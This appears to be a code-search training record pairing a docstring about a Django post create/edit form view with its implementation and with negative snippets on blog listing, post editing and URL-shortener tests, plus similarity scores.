"def main():\n\n url = 'https://blog.docker.com/category/engineering/'\n\n response = requests.get(url)\n\n #print response.text\n\n blog_list = []\n\n response_data = BeautifulSoup(response.text, \"html.parser\")\n\n if response_data.__len__() == 0:\n print \"no data returned\"\n exit(1)\n\n for each_title in response_data.find_all('entry-title'):\n print each_title.text\n #blog_title = each_title.text\n #if blog_title != 'X':\n # blog_list.append((blog_title.text))\n\n #for blog_data in blog_list:\n # print blog_data.text\n\n print 'End main'\n pass",
"def listBlogEntries(self, space):\n return tuple(BlogEntry.create(blogDict, self._modelDataManager) for blogDict in self.pm_getSpaceManager().listBlogEntries(self._unbox(space)))",
"def get_bloglist_by_search(txtSearch):\n key = KEY_SEARCH_PREFIX + txtSearch.upper()\n blogs = RedisHelper.get_cache(key)\n if RedisHelper.is_cache_exist(key) is False:\n blogs = Article.objects.filter(Q(caption__icontains=txtSearch) | Q(content__icontains=txtSearch)\n , active=True).order_by('-publish_time')\n RedisHelper.create_cache(key, blogs, RedisTimeOut.REDIS_TIMEOUT_1_DAYS)\n #print connection.queries\n return blogs",
"def get_posts(self):\r\n postList = []\r\n for tag in self.setting.imgurTags:\r\n try:\r\n req = requests.get('%s%s' % (self.setting.tagLink, tag), headers=self.setting.imgurHeaders)\r\n for post in req.json()['data']['items']:\r\n p = self.json_to_post(post, tag)\r\n if p is not None:\r\n postList.append(p)\r\n except Exception as e:\r\n self.logger.log(logger.LogLevel.CRITICAL, 'imgur.get_posts exception(%s): %s' % (tag, e))\r\n break\r\n return postList",
"def list_all(request):\n\n entries = BlogEntry.objects.all()\n data = {'entries': paginate_objects(request, entries),\n 'blog_info': get_blog_info(), 'action_str': 'All Blogs Shown'}\n\n return render_to_response('blog/list_entries.html', data,\n context_instance=get_rq(request))",
"def all_title() -> list:\n return [i[\"title\"] for i in Blogs_Manager.TablePost.all_query()]",
"def get_posts(request):\n posts = Post.objects.order_by(\"created_date\")\n return render(request, \"blogposts.html\", {\"posts\": posts})",
"def load_posts_by_type(self, type):\n return self.load_posts_by_type_id(type.id)",
"def get_posts():\n url = app.config['POSTS_ENDPOINT']\n response = requests.get(url, params={})\n if response.status_code == 200:\n return parse_posts(response.json())\n raise RuntimeError('Error in retrieving posts.')",
"def get(self):\n return get_all_posts()",
"def test_get_all_blogs(self):\n\n self.new_blog.saveBlog()\n got_blog = Blog.getallBlogs()\n self.assertTrue(len(got_blog) == 1)",
"def blogs_list(request):\n\n # recupera blogs\n blogs = Blog.objects.order_by('-created_at').select_related(\"owner\").all()\n\n # prepara el contexto de la plantilla\n context = {\n 'blog_objects': blogs\n }\n\n # renderiza y devuelve la plantilla\n return render(request, 'blogs/blogs.html', context)",
"def get_posts(wp):\n from wordpress_xmlrpc.methods.posts import GetPosts\n\n all_posts = []\n\n offset = 0\n increment = 20\n while True:\n posts = wp.call(GetPosts({'number': increment, 'offset': offset, 'post_type': 'post'}))\n if len(posts) == 0:\n break # no more posts returned\n for post in posts:\n all_posts.append(post)\n\n offset = offset + increment\n\n return all_posts",
"def posts_list(request):\n\n # recupera posts\n posts = Post.objects.select_related(\"owner\").filter(Q(publish_at__lte=now())).all()\n categorias = Categoria.objects.all()\n\n # prepara el contexto de la plantilla\n context = {\n 'post_objects': posts,\n 'categoria_objects': categorias\n }\n\n # renderiza y devuelve la plantilla\n return render(request, 'blogs/inicio.html', context)",
"async def getBlogs(self, page_no=None, page_size=None, body=\"\"):\n payload = {}\n \n if page_no:\n payload[\"page_no\"] = page_no\n \n if page_size:\n payload[\"page_size\"] = page_size\n \n # Parameter validation\n schema = ContentValidator.getBlogs()\n schema.dump(schema.load(payload))\n \n\n url_with_params = await create_url_with_params(api_url=self._urls[\"getBlogs\"], proccessed_params=\"\"\"{\"required\":[],\"optional\":[{\"name\":\"page_no\",\"in\":\"query\",\"description\":\"The page number to navigate through the given set of results. Default value is 1. \",\"required\":false,\"schema\":{\"type\":\"integer\",\"default\":1}},{\"name\":\"page_size\",\"in\":\"query\",\"description\":\"The number of items to retrieve in each page.\",\"required\":false,\"schema\":{\"type\":\"integer\",\"default\":10}}],\"query\":[{\"name\":\"page_no\",\"in\":\"query\",\"description\":\"The page number to navigate through the given set of results. Default value is 1. \",\"required\":false,\"schema\":{\"type\":\"integer\",\"default\":1}},{\"name\":\"page_size\",\"in\":\"query\",\"description\":\"The number of items to retrieve in each page.\",\"required\":false,\"schema\":{\"type\":\"integer\",\"default\":10}}],\"headers\":[],\"path\":[]}\"\"\", page_no=page_no, page_size=page_size)\n query_string = await create_query_string(page_no=page_no, page_size=page_size)\n headers = {\n \"Authorization\": \"Bearer \" + base64.b64encode(\"{}:{}\".format(self._conf.applicationID, self._conf.applicationToken).encode()).decode()\n }\n if self._conf.locationDetails:\n headers[\"x-location-detail\"] = ujson.dumps(self._conf.locationDetails)\n for h in self._conf.extraHeaders:\n headers.update(h)\n exclude_headers = []\n for key, val in headers.items():\n if not key.startswith(\"x-fp-\"):\n exclude_headers.append(key)\n return await AiohttpHelper().aiohttp_request(\"GET\", url_with_params, headers=get_headers_with_signature(urlparse(self._urls[\"getBlogs\"]).netloc, \"get\", await create_url_without_domain(\"/service/application/content/v1.0/blogs/\", page_no=page_no, page_size=page_size), query_string, headers, body, exclude_headers=exclude_headers), data=body, cookies=self._conf.cookies)"
] |
[
"0.6843838",
"0.66168576",
"0.64832556",
"0.643797",
"0.6422606",
"0.63961023",
"0.6386245",
"0.63789034",
"0.6268875",
"0.6239763",
"0.6238986",
"0.6229432",
"0.6159942",
"0.61539686",
"0.61382884",
"0.6066054",
"0.6027976",
"0.5964492",
"0.59064484",
"0.5799068",
"0.5790868",
"0.5767482",
"0.57665193",
"0.5711364",
"0.56987065",
"0.5695277",
"0.5692372",
"0.56492764",
"0.56172895",
"0.5613897"
] |
0.7582103
|
0
|
Displays a view that will allow form input. If pk is not NULL then show the post to edit. Otherwise it will be an empty form to create anew
|
def show_post_form(request, pk=None):
post = get_object_or_404(Post, pk=pk) if pk else None
header = "Edit \"{0}\"".format(post.title) if pk else "New Post"
title = "Edit #{0}".format(pk) if pk else "New Post"
if request.method == "POST":
form = PostForm(request.POST, request.FILES, instance=post)
if form.is_valid():
form.instance.author = request.user
post = form.save()
return redirect(post_detail, post.pk)
else:
form = PostForm(instance=post)
return render(request, "postform.html", {"form":form, "title": title, "header": header})
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def show_edit_post_form(user_id, post_id):\n\n post = Post.query.get_or_404(post_id)\n user = post.user\n\n return render_template('edit_post.html', post=post, user=user)",
"def show_edit_post_form(post_id):\n post = Post.query.get_or_404(post_id)\n\n return render_template('posts/edit.html', post=post)",
"def edit_post(request, post_id):\n post = Post.objects.get(id=post_id)\n check_post_owner(request, post)\n\n if request.method != 'POST':\n # Initial request; pre-fill form with the current entry.\n form = PostForm(instance=post)\n else:\n # POST data submitted; process data.\n form = PostForm(instance=post, data=request.POST)\n if form.is_valid():\n form.save()\n return redirect('blogs:post', post_id=post.id)\n\n context = {'post': post, 'form': form}\n return render(request, 'blogs/edit_post.html', context)",
"def edit_post(post_id):\n\n form = forms.PostForm()\n posts = models.Post.select().where(models.Post.id == post_id)\n if posts.count() == 0:\n abort(404)\n elif form.validate_on_submit():\n models.Post.create(title=form.title.data,\n date=form.date.data,\n time_spent=form.time_spent.data,\n details=form.details.data,\n remember=form.remember.data)\n models.Post.get(models.Post.id == post_id).delete_instance()\n return redirect(url_for('index'))\n return render_template('edit.html', posts=posts, form=form)",
"def show_edit_post(post_id):\n post = Post.query.get_or_404(post_id)\n\n return render_template('edit-post.html', post=post)",
"def edit(request):\n if 'form.submitted' in request.params:\n # delete old post\n title = request.params['title']\n name = title_to_name(title)\n\n if not name or DBSession.query(Post).filter(Post.name==name).count():\n # this should be a popup ajaxy box\n return Response(\"Name %s is in use, choose a different title\" % name, content_type='text/plain', status_int=500)\n\n body = request.params['body']\n post = Post(title, body, name)\n DBSession.add(post)\n return HTTPFound(location = request.route_url('view_post', postname=name))\n\n save_url = request.route_url('edit_post')\n post = DBSession.query(Post).filter(Post.name==name).first()\n return environment_factory(post=post, save_url=save_url)",
"def edit_post(bid, pid):\n # pylint: disable=unused-argument\n pst = Post.query.get(pid)\n form = PostForm(request.form)\n if request.method == 'POST' and current_user.uid == pst.uid:\n if form.validate():\n if pst.name != form.name.data or pst.text != form.desc.data:\n og_name = pst.name\n pst.name = form.name.data\n pst.text = form.desc.data\n DB.session.commit()\n flash('Post ({}) successfully edited!'.format(og_name))\n else:\n flash(constants.DEFAULT_SUBMISSION_ERR)\n return redirect(request.referrer)",
"def edit_profile_post(request, pk=None):\n profilepost = get_object_or_404(ProfilePost, pk=pk) \n if (request.user == profilepost.user or\n request.user.is_superuser):\n if request.method == \"POST\":\n profile_post_form = ProfilePostForm(request.POST, request.FILES, instance=profilepost)\n if profile_post_form.is_valid():\n profilepost = profile_post_form.save()\n messages.success(request, 'Your post has been updated!') \n return redirect(reverse('profile'))\n else:\n profile_post_form = ProfilePostForm(instance=profilepost)\n else:\n return HttpResponseForbidden()\n\n return render(request, 'newprofilepost.html', {'profile_post_form': profile_post_form})",
"def edit_post(post_id):\n\n post_data = {\"id\": post_id}\n db_post = Post.query.get_or_404(post_id)\n post_data[\"title\"] = db_post.title\n post_data[\"content\"] = db_post.content\n post_data[\"user_id\"] = db_post.user_id\n\n return render_template(\"edit_post.html\", headline=\"Add New Blogly User\", post=post_data)",
"def edit_form():\n return template (\"edit\")",
"def show_post_edit(post_id):\n\n post = Post.query.get_or_404(post_id)\n tags = Tag.query.all()\n\n return render_template(\"posts/edit_post.html\", post=post, tags=tags)",
"def task_edit(request, pk):\n task_manager = TaskManager.objects.get(id=pk)\n task = task_manager.task\n if request.method == 'POST':\n \ttask_form = TaskForm(request.POST)\n \ttask_owner = request.user\n\n \tif task_form.is_valid():\n \t\ttask_name = task_form.cleaned_data.get('task_name')\n \t\ttask_description = task_form.cleaned_data.get('task_description')\n\n \t\tif task_manager.task_owner == task_owner:\n \t\t\ttask.task_name = task_name\n \t\t\ttask.task_description = task_description\n \t\t\ttask.save()\n \t\t\treturn redirect('task_list')\n else:\n \tform = TaskForm(instance=task)\n\n context = {'form': form, 'task_manager':task_manager}\n return render(request, 'tasker/task_edit.html', context)",
"def edit_post(post_id):\n\n post = Post.query.get_or_404(post_id)\n\n title = request.form[\"title\"]\n content = request.form[\"content\"]\n tags = request.form.getlist(\"tag\")\n post.tags = []\n if tags:\n for tag in tags:\n post.tags.append(Tag.query.filter(Tag.name==tag).one())\n\n if not title or not content:\n flash(\"Please enter a title and content\")\n return redirect(f\"/posts/{post.id}/edit\")\n\n post.title = title\n post.content = content\n db.session.add(post) \n db.session.commit()\n\n return redirect(f\"/posts/{post_id}\")",
"def show_edit_form(self, obj_pk=None):\n obj = self.model.objects.get(pk=obj_pk)\n # if there is no edit permission then does not show the form\n if not self.has_view_permissions(obj): return\n\n\n # create the edit form a add it to the empty widget details\n # override the function hide_form to make sure the list is shown after the user close the edition form\n params = {\n 'title':'Edit',\n 'model':self.model,\n 'pk':obj.pk,\n 'parent_model':self.parent_model,\n 'parent_pk':self.parent_pk,\n 'parent_win': self\n }\n\n if self.INLINES: params.update({'inlines': self.INLINES} )\n if self.FIELDSETS: params.update({'fieldsets':self.FIELDSETS})\n if self.READ_ONLY: params.update({'readonly': self.READ_ONLY})\n\n editmodel_class = self.get_editmodel_class(obj)\n editform = editmodel_class(**params)\n\n if hasattr(self, '_details') and self.USE_DETAILS_TO_EDIT:\n self._details.value = editform\n self._list.hide()\n self._details.show()\n\n # only if the button exists:\n toolbar = [self.toolbar] if isinstance(self.toolbar, str) else self.toolbar\n if toolbar:\n for o in toolbar:\n if o and hasattr(self, o): getattr(self, o).hide()\n\n else:\n self._list.show()\n if hasattr(self, '_details'):\n self._details.hide()",
"def editor_edit_post(post_id=None):\n post = Post.query.get(post_id)\n return render_template('ghostdown.html', post=post)",
"def edit_post(request, year, month, day, slug):\n post = get_model_for_date_and_slug(Post, year, month, day, slug)\n form = PostForm(instance=post)\n if request.method == \"POST\":\n form = PostForm(request.POST, instance=post)\n if form.is_valid():\n post = form.save()\n if \"continue_editing\" in request.POST:\n return http.HttpResponseRedirect(post.get_edit_url())\n return http.HttpResponseRedirect(post.get_absolute_url())\n return render_to_response(\"montgomery/edit_post.html\", {\"form\": form}, context_instance=RequestContext(request))",
"def show_pet_with_edit_form(pet_id):\n pet = Pet.query.get_or_404(pet_id)\n form = PetFormEdit(obj=pet)\n if form.validate_on_submit():\n pet.photo_url = form.photo_url.data\n pet.notes = form.notes.data\n pet.available = form.available.data\n \n db.session.commit()\n return redirect('/')\n else:\n return render_template('pet.html', pet=pet, form=form)",
"def handle_edit_post(post_id):\n edited_post = Post.query.get_or_404(post_id)\n\n edited_post.title = request.form['post-title']\n edited_post.content = request.form['post-content']\n\n db.session.add(edited_post)\n db.session.commit()\n\n return redirect(f\"/users/{edited_post.user_id}\")",
"def edit_view(request, title, modelform, instance=None, **kwargs):\n instance_form = modelform(request.POST or None, instance=instance)\n if instance_form.is_valid():\n instance = instance_form.save()\n messages.success(request, _(\"%s was edited.\") % instance)\n return redirect(instance.get_absolute_url())\n return form(\n {**kwargs, \"form\": instance_form, \"action_name\": _(\"Edit\"), \"title\": title},\n \"deployments/form.html\",\n request,\n )",
"def get_view(post_id):\n # create DB connection\n db_connection = sqlite3.connect(DB_FILE)\n db_cursor = db_connection.cursor()\n post_info = get_post_info(db_cursor, post_id)\n # close DB connection\n db_connection.close()\n page_title = \"Blog Manager | Edit Post\"\n styles = [ '/static/stylesheets/blog/edit_post_style.css' ]\n scripts = [ '/static/scripts/jquery.js', '/static/blog/scripts/edit_post_scripts.js' ]\n return render_template(\"blog/edit_post.html\", page_title=page_title, styles=styles, scripts=scripts, post_info=post_info)",
"def show_edit_post(post_id):\r\n post = Post.query.get_or_404(post_id)\r\n tags = Tag.query.all()\r\n return render_template('edit-post.html', post=post, tags=tags)",
"def edit(slug):\n entry = get_object_or_404(Entry, Entry.slug == slug)\n if request.method == 'POST':\n if request.form.get('title'):\n entry.title = request.form.get('title')\n if request.form.get('content'):\n entry.content = request.form.get('content')\n entry.published = request.form.get('published') or False\n entry.save()\n\n flash('Entry saved successfully!', 'success')\n if entry.published:\n return redirect(url_for('detail', slug=entry.slug))\n else:\n return redirect(url_for('edit', slug=entry.slug))\n return render_template('edit.html', entry=entry)",
"def new_post(request):\n if request.method != 'POST':\n # No data submitted; create a blank form.\n form = PostForm()\n else:\n # POST data submitted; process data.\n form = PostForm(data=request.POST)\n if form.is_valid():\n new_post = form.save(commit=False)\n new_post.owner = request.user\n new_post.save()\n return redirect('blogs:posts')\n\n # Display a blank or invalid form.\n context = {'form': form}\n return render(request, 'blogs/new_post.html', context)",
"def edit(self, *args, **kw):\n\t\t\ttmpl_context.widget = self.edit_form\n\t\t\tpks \t\t= self.provider.get_primary_fields(self.model)\n\t\t\tkw \t\t\t= {}\n\n\t\t\tfor i, pk in enumerate(pks):\n\t\t\t\tkw[pk] \t\t= args[i]\n\n\t\t\tvalue \t\t= self.edit_filler.get_value(kw)\n\t\t\tvalue['_method'] \t= 'PUT'\n\n\t\t\treturn dict(value = value, model = self.model.__name__, pk_count = len(pks))",
"def update(id):\n if request.method == \"POST\":\n result = update_post(\n id,\n request.form[\"title\"],\n request.form[\"body\"]\n )\n flash(result)\n return redirect(url_for(\"show\"))\n else:\n post = get_post(id)\n return render_template(\"edit.html\", **post)",
"def community_post_create_view(request):\n task = \"Create New\"\n form = AddEditPostForm() # An unbound form\n\n if request.method == 'POST': # If the form has been submitted...\n form = AddEditPostForm(request.POST, request.FILES) # A form bound to the POST data\n if form.is_valid(): # All validation rules pass\n post = form.save(commit=False) # Create a new object from the form, but don't save it to the database\n post.author = request.user # Set the author to the current user\n post.save() # Save the object to the database\n slug_str = \"%s %s\" % (post.title, post.date_posted) # Create a slug from the title and date\n post.slug = slugify(slug_str) # Create the slug\n post.save() # Save the object to the database\n return redirect('community-home') # Redirect to the home page\n\n context = { # Pass the variables to the template\n 'task': task,\n 'form': form,\n }\n return render(request,\n 'pages/patient-community/community-create-update-post.html',\n context) # render the patient community create post page",
"def edit(request,entry_id):\n assert isinstance(request, HttpRequest)\n try:\n entry = Entry.objects.get(pk=entry_id)\n except Entry.DoesNotExist:\n raise Http404(\"指定されたブログが存在しません。\")\n if not request.user or request.user.pk != entry.member.pk: # ブログ作成者以外は編集できない\n return HttpResponseForbidden() #アドレスをコピペしなければ通常は起こらないため例外処理で済ませておく。\n\n if request.method == 'POST': # フォームが提出された\n form = EntryForm(request.POST, instance = entry) # POST データの束縛フォーム\n if form.is_valid(): # バリデーションを通った\n form.save()\n return HttpResponseRedirect(reverse('entry_list')) # POST 後のリダイレクト\n else:\n form = EntryForm(instance = entry) # 非束縛フォーム\n article_list = Article.objects.order_by('-released_at')[:5]\n return render(request, 'app/entry_edit.html', { \n 'form': form,\n 'title':'ブログ記事の編集',\n 'year':datetime.now().year,\n 'articles':article_list,\n 'blogs':EntryView.get_entry_list('-posted_at',-1, request.user.pk )[:5],\n 'submit_title':'更新',\n 'entry_pk':entry.pk,\n 'current_user':request.user,\n })",
"def edit_textpost(request, textpost_id):\n\n textpost = TextPost.objects.get(id=textpost_id)\n textpost_age = get_submission_age(textpost)\n\n # Redirect unauthenticated users to register/ login.\n if not request.user.is_authenticated():\n return redirect('login')\n\n if request.method == 'POST':\n\n edit_textpost_form = TextPostForm(data=request.POST, instance=textpost)\n\n if edit_textpost_form.is_valid():\n # Make sure user can still edit,\n # and window has not passed since form displayed.\n if not can_edit_textpost(textpost, request):\n return redirect('/discuss/%s/' % textpost.id)\n\n edited_textpost = edit_textpost_form.save(commit=False)\n textpost.post_body = edited_textpost.post_body\n textpost.title = edited_textpost.title\n textpost.save()\n\n # Invalidate caches: This affects the discussion page for the textpost.\n # If title changed, also affects /index and /new caches.\n invalidate_caches('ed_news', 'index', 'new')\n invalidate_cache('discuss', (textpost.id, ), namespace='ed_news')\n\n # Redirect to discussion page.\n return redirect('/discuss/%s/' % textpost.id)\n\n else:\n # Invalid form/s.\n # Print errors to console; should log these?\n print 'ae', edit_textpost_form.errors\n\n else:\n # Send blank forms.\n edit_textpost_form = TextPostForm(instance=textpost)\n\n return render_to_response('ed_news/edit_textpost.html',\n {'edit_textpost_form': edit_textpost_form,\n 'textpost_id': textpost.id,\n },\n context_instance = RequestContext(request))",
"def edit_product(request, pk):\n\n products = get_object_or_404(Product, pk=pk)\n if request.method == 'POST':\n form = ProductPostForm(request.POST, instance=products)\n if form.is_valid():\n product = form.save()\n return redirect(product_details, product.pk)\n else:\n form = ProductPostForm(instance=products)\n return render(request, 'editproduct.html', {'form': form})",
"def show_edit_pet(id):\r\n pet = Pet.query.get_or_404(id)\r\n form = EditPetForm(obj=pet)\r\n\r\n if form.validate_on_submit():\r\n pet.photo_url = form.photo_url.data\r\n pet.notes = form.notes.data\r\n pet.available = form.available.data\r\n db.session.commit()\r\n\r\n return redirect('/')\r\n\r\n else:\r\n return render_template(\"pet_profile.html\", form=form, pet=pet)"
] |
[
"0.7231483",
"0.7201218",
"0.7087486",
"0.7010236",
"0.68301785",
"0.6799687",
"0.6771347",
"0.6679671",
"0.6574036",
"0.6568781",
"0.6561252",
"0.65269125",
"0.6515878",
"0.6515492",
"0.65128314",
"0.6512196",
"0.6499526",
"0.6496251",
"0.6495946",
"0.6487876",
"0.6430513",
"0.6422505",
"0.639111",
"0.6357845",
"0.6357224",
"0.6352436",
"0.6343541",
"0.63301826",
"0.6298263",
"0.6294746"
] |
0.7842363
|
0
|
Tests adding of a Short URL with a custom key.
|
def test_add_with_key(self):
self.client.login(username='admin', password='admin')
response = self.client.post('/add/', {'url': 'http://example.com', 'key': 'example'}, follow=True)
self.assertShortURLCreated(response, 'example')
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def test_already_shortened_success(self):\n # Shorten a URL\n self.client.post(\n reverse('url_shortener'),\n data=json.dumps({'url': 'https://www.techcrunch.com/a-slug-here-starting-from-a'}),\n content_type='application/json'\n )\n\n # Try to shorten the same URL again.\n response = self.client.post(\n reverse('url_shortener'),\n data=json.dumps({'url': 'https://www.techcrunch.com/a-slug-here-starting-from-a'}),\n content_type='application/json'\n )\n self.assertEqual(response.status_code, 200)\n content = json.loads(response.content)\n self.assertEqual(content.get('shortened_url'), '{}/{}'.format(SITE_URL, 'a_test'))",
"def test_short_url(self):\n tweet_object = self.load_tweet('basic')\n tweet_text = self.api.html_for_tweet(tweet_object, False)\n # Make sure HTML doesn't contain the display OR expanded url\n self.assertTrue('http://google.com' not in tweet_text)\n self.assertTrue('google.com' not in tweet_text)",
"def test_already_created_shortlink(self):\n rv = self.post('https://www.seinfeld.com')\n assert '<a href=\"TheStakeOut\">TheStakeOut</a> is now short for <a href=\"https://www.seinfeld.com\">https://www.seinfeld.com</a>!' in rv.data\n rv = self.post('https://www.seinfeld.com')\n assert '<a href=\"TheStakeOut\">TheStakeOut</a> is now short for <a href=\"https://www.seinfeld.com\">https://www.seinfeld.com</a>!' in rv.data",
"def short_url(self, short_url):\n\n self._short_url = short_url",
"def test_create_shortlink(self):\n rv = self.post('https://www.seinfeld.com')\n assert '<a href=\"TheStakeOut\">TheStakeOut</a> is now short for <a href=\"https://www.seinfeld.com\">https://www.seinfeld.com</a>!' in rv.data",
"def test_update_short_url(self):\n old_target = 'http://old.com'\n new_target = 'http://new.com'\n\n old_short_url = ShortUrl.objects.create(target=old_target)\n\n client = RequestsClient()\n response = client.patch('http://testserver/api/v1/urls/%s' % old_short_url.hash, json={'target': new_target})\n assert response.status_code == 200\n\n short_url = dict(response.json())\n self.assertEqual(short_url.get('target'), new_target)",
"def validate_short_url(self, value: str) -> str:\n url_id = self.context.get(\"url_id\") # just in update mode we have id.\n\n if url_id: # for update step old and new short_value could be same.\n try:\n old_short_url = URL.objects.get(id=url_id).short_url\n except URL.DoesNotExist:\n raise serializers.ValidationError(\"url does not exists!\")\n if old_short_url == value:\n return value\n\n if value and url_validator(value):\n raise serializers.ValidationError(\n \"custom short_url could not be URL itself.Please try for sequence of string instead of a valid URL!\"\n )\n return value",
"def test_create_short_url_without_device(self):\n client = RequestsClient()\n response = client.post('http://testserver/api/v1/urls', json={'target': 'http://example.com'})\n assert response.status_code == 201\n\n short_url = dict(response.json())\n self.assertIsNone(short_url.get('mobile_url'))\n self.assertIsInstance(short_url.get('target'), str)",
"def validate_short_url(form, field):\n if not field.data.isalnum():\n raise ValidationError('Custom alias must be alphanumeric.')",
"def test_create_short_url_with_device(self):\n target = 'http://exmaple.com'\n mobile_target = 'http://mobile.exmaple.com'\n tablet_target = 'http://tablet.exmaple.com'\n desktop_target = 'http://desktop.exmaple.com'\n data = {\n 'target': target,\n 'mobile_url': {'target': mobile_target},\n 'tablet_url': {'target': tablet_target},\n 'desktop_url': {'target': desktop_target},\n }\n\n client = RequestsClient()\n response = client.post('http://testserver/api/v1/urls', json=data)\n\n assert response.status_code == 201\n\n short_url = dict(response.json())\n self.assertIsNotNone(short_url.get('mobile_url'))\n self.assertIsNotNone(short_url.get('tablet_url'))\n self.assertIsNotNone(short_url.get('desktop_url'))\n\n mobile_url = short_url.get('mobile_url')\n tablet_url = short_url.get('tablet_url')\n desktop_url = short_url.get('desktop_url')\n\n self.assertEqual(mobile_url.get('target'), mobile_target)\n self.assertEqual(tablet_url.get('target'), tablet_target)\n self.assertEqual(desktop_url.get('target'), desktop_target)",
"def test_success(self):\n response = self.client.post(\n reverse('url_shortener'),\n data=json.dumps({'url': 'https://www.techcrunch.com/some-slug-here-starting-from-s'}),\n content_type='application/json'\n )\n self.assertEqual(response.status_code, 201)\n\n response = self.client.post(\n reverse('url_shortener'),\n data=json.dumps({\n 'url': 'https://www.techcrunch.com/some-other-slug-here-starting-again-from-s'\n }),\n content_type='application/json'\n )\n self.assertEqual(response.status_code, 201)\n\n response = self.client.post(\n reverse('url_shortener'),\n data=json.dumps({'url': 'https://www.techcrunch.com/some-third-long-slug'}),\n content_type='application/json'\n )\n self.assertEqual(response.status_code, 201)\n\n content = json.loads(response.content)\n self.assertEqual(content.get('shortened_url'), '{}/{}'.format(SITE_URL, 'oaf'))",
"def test_shorturl_not_saving_without_longurl(self):\n db.session.add(self.short_url)\n with self.assertRaises(sqlalchemy.exc.IntegrityError):\n db.session.commit()",
"def url_shortner(self):",
"def test_short():\n key = 'A' * 241\n full_key = 'prefix:1:%s' % key\n assert full_key == make_key(key, 'prefix', 1)",
"def test_add(self):\n self.client.login(username='admin', password='admin')\n response = self.client.post('/add/', {'url': 'http://example.com'}, follow=True)\n self.assertShortURLCreated(response)",
"def test_add_url(self):\n url = 'http://test.com/'\n info = self.api.add_url(url, tags=['asd'])\n self.assertEqual(info['value'], url)\n tags = [t['name'] for t in info['tags']]\n self.assertEqual(tags, ['asd'])",
"def register_custom_short_path(short_path, content):",
"def short(self, url):\r\n\r\n self.clean_url(url)\r\n json = {\"originalURL\": url, \"domain\": self.domain}\r\n headers = {\"authorization\": self.api_key}\r\n response = self._post(self.api_url, json=json, headers=headers)\r\n if response.ok:\r\n data = response.json()\r\n if \"shortURL\" not in data:\r\n raise ShorteningErrorException(\r\n f\"API Returned wrong response: \" f\"{data}\"\r\n )\r\n return data[\"shortURL\"]\r\n raise ShorteningErrorException(response.content)",
"def test_generateRandom(self):\n\n # commented as of now as its failing randomly. Race due to\n # monkey patching ???\n # self.assertEqual(len(self.urlShortener.generateShortUrl()), 6)\n # self.assertEqual(len(self.urlShortener.generateShortUrl(7)), 7)\n\n self.assertEqual(self.urlShortener.generateShortUrl().isalnum(), True)",
"def test_shorturl_is_active_defaults(self):\n self.long_url.short_urls.append(self.short_url)\n self.user.short_urls.append(self.short_url)\n self.long_url.users.append(self.user)\n db.session.add(self.short_url)\n db.session.commit()\n self.assertTrue(self.short_url.is_active)",
"def test_forward(self):\n short_url = ShortURL.objects.create(url='http://example.com')\n response = self.client.get('/%s'%(short_url.key))\n self.assertEqual(response.status_code, 301)",
"def test_twitter_shortlink(self):\n\n test = Unfurl(remote_lookups=True)\n test.add_to_queue(data_type='url', key=None, value='https://t.co/g6VWYYwY12')\n test.parse_queue()\n\n # test number of nodes\n self.assertEqual(len(test.nodes.keys()), 18)\n self.assertEqual(test.total_nodes, 18)\n\n self.assertEqual(test.nodes[4].value, '/g6VWYYwY12')\n self.assertEqual(test.nodes[11].value, 'github.com')\n self.assertEqual(test.nodes[16].label, '1: obsidianforensics')\n\n # is processing finished empty\n self.assertTrue(test.queue.empty())\n self.assertEqual(len(test.edges), 0)",
"def short_post():\n short = str (request.form.get('short'))\n url = str (request.form.get('url'))\n url = http_check(url)\n \n if (short == \"\"): #Uses random hash url if URL is left blank. \n short = hash_gen(5)\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.execute(\"SELECT * from shorts where short='\" + short + \"'\")\n data = cursor.fetchone()\n\n if data is not None: #Throws 404 if the user tries to set a short URL already in use\n return flask.render_template('error.html', error=\"Short URL is already in use.\"), 404\n cursor.execute(\"INSERT into shorts (url, short, numclicked, lastaccess) VALUES ('\" + url + \"','\" + short + \"',0,CURDATE())\")\n conn.commit()\n #db[short] = url\n return flask.render_template(\"shorten.html\", short=short, url=url)",
"def test_missing_shortlink(self):\n rv = self.app.get('/TheStakeOut')\n assert 'No url found' in rv.data",
"def set_short_url_base(url):",
"def shortenedURL_detail(request, short_url):\n try:\n shortenedURL = ShortenedURL.objects.get(short_url=short_url)\n if request.method == 'GET':\n serializer = ShortenedURLSerializer(shortenedURL)\n return JsonResponse(serializer.data)\n\n if request.method == 'PUT':\n data = JSONParser().parse(request)\n serializer = ShortenedURLSerializer(shortenedURL, data=data)\n if serializer.is_valid():\n serializer.save()\n return JsonResponse(serializer.data)\n return JsonResponse(serializer.errors, status=400)\n\n if request.method == 'DELETE':\n shortenedURL.delete()\n return HttpResponse(status=204)\n except ShortenedURL.DoesNotExist:\n return HttpResponse(status=404)",
"def test_shorturl_time_saving(self):\n self.long_url.short_urls.append(self.short_url)\n self.user.short_urls.append(self.short_url)\n self.long_url.users.append(self.user)\n db.session.add(self.short_url)\n db.session.commit()\n self.assertIsInstance(self.short_url.date_created, datetime)",
"def test_update_short_url_with_device(self):\n old_target = 'http://old.com'\n old_mobile_target = 'http://mobile.old.com'\n old_tablet_target = 'http://tablet.old.com'\n old_desktop_target = 'http://desktop.old.com'\n\n new_target = 'http://new.com'\n new_mobile_target = 'http://mobile.new.com'\n new_tablet_target = 'http://tablet.new.com'\n new_desktop_target = 'http://desktop.new.com'\n\n new_data = {\n 'target': new_target,\n \"mobile_url\": {\"target\": new_mobile_target},\n \"tablet_url\": {\"target\": new_tablet_target},\n \"desktop_url\": {\"target\": new_desktop_target}\n }\n\n\n old_short_url = ShortUrl.objects.create(target=old_target)\n old_short_url.mobile_url = old_mobile_target\n old_short_url.tablet_url = old_tablet_target\n old_short_url.desktop_url = old_desktop_target\n old_short_url.save()\n\n client = RequestsClient()\n response = client.patch('http://testserver/api/v1/urls/%s' % old_short_url.hash, json=new_data)\n assert response.status_code == 200\n\n short_url = dict(response.json())\n self.assertEqual(short_url.get('target'), new_target)\n self.assertEqual(short_url.get('mobile_url').get('target'), new_mobile_target)\n self.assertEqual(short_url.get('tablet_url').get('target'), new_tablet_target)\n self.assertEqual(short_url.get('desktop_url').get('target'), new_desktop_target)",
